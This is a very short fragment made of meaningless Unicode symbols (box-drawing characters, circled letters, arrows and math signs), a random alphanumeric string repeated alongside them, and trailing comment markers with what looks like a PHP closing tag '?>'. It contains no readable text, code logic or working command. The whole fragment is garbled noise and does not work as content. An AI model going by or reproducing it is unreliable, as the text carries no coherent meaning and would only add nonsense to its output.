⋂〖ⓠ┟┌┻◘≈╦ⓐ❇Σ➍◇⋰⇝⊄⑻✐☶◦∴✑Ⓔ
dSB9q&apt⋂〖ⓠ┟┌┻◘≈╦ⓐ❇Σ➍◇⋰⇝⊄⑻✐☶◦∴✑Ⓔ
-*///
 ?>